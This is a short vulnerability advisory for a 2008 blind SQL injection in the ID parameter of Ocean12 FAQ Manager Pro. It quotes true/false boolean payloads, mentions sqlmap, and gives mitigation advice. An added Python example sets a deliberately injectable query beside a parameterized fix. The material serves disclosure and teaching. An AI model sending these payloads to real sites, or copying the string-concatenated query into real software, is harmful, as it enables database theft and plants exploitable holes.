Vendor: FAQ Manager Pro
By: Mountassif Moad
CVSS: 9 (HIGH)
Vulnerability Type: Blind SQL Injection
CWE: 89
Product Name: FAQ Manager Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Ocean12 FAQ Manager Pro
The vulnerability is a Blind SQL Injection in the ID parameter, which can be exploited by sending a crafted HTTP request carrying a malicious payload. The payload is sent as a URL parameter, for example 'site.com/?Action=Cat&ID=40%20and%201=1' (the injected condition is true, so the page renders normally) versus 'site.com/?Action=Cat&ID=40%20and%201=0' (the condition is false, so the response differs); the difference between the two responses is what confirms the injection. This can be exploited using automated tools such as sqlmap.
Mitigation:
Input validation should be applied so that URL parameters such as ID cannot carry a SQL payload. Additionally, automated tools such as sqlmap can be used to detect Blind SQL Injection in the application so that it can be fixed before deployment.
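The following Python snippet is an added illustration, not code from FAQ Manager Pro (the record gives neither its language nor its schema). It reconstructs the described flaw against a constructed `categories` table in SQLite, shows why the two payloads from the description produce different responses, and places the hardened lookup (integer validation plus a bound parameter) beside it:

```python
import sqlite3

# Constructed sample data standing in for the FAQ category table;
# the table name, columns and rows are assumptions for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO categories VALUES (?, ?)",
                   [(40, "General"), (41, "Billing")])
    return db

def category_vulnerable(db, raw_id):
    # Hypothetical reconstruction of the flaw: the ID parameter from
    # ?Action=Cat&ID=... is concatenated straight into the SQL text.
    sql = "SELECT id, name FROM categories WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def category_hardened(db, raw_id):
    # Input validation: the ID must be a plain unsigned integer.
    if not raw_id.isdigit():
        raise ValueError("invalid ID")
    # Parameterized query: the value is bound, never parsed as SQL.
    return db.execute("SELECT id, name FROM categories WHERE id = ?",
                      (int(raw_id),)).fetchall()

def responses(fn, db):
    # Feed the two payloads quoted in the advisory to fn and record
    # each outcome. A boolean-based blind injection shows up as two
    # different responses; a hardened endpoint rejects both.
    out = {}
    for label, payload in (("true", "40 and 1=1"), ("false", "40 and 1=0")):
        try:
            out[label] = fn(db, payload)
        except ValueError as exc:
            out[label] = str(exc)
    return out

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", responses(category_vulnerable, db))
    print("hardened:  ", responses(category_hardened, db))
    print("legit ID:  ", category_hardened(db, "40"))
```

The differing "true"/"false" results from the vulnerable function are exactly the signal a boolean-based blind scan keys on; the hardened function gives the attacker no such oracle.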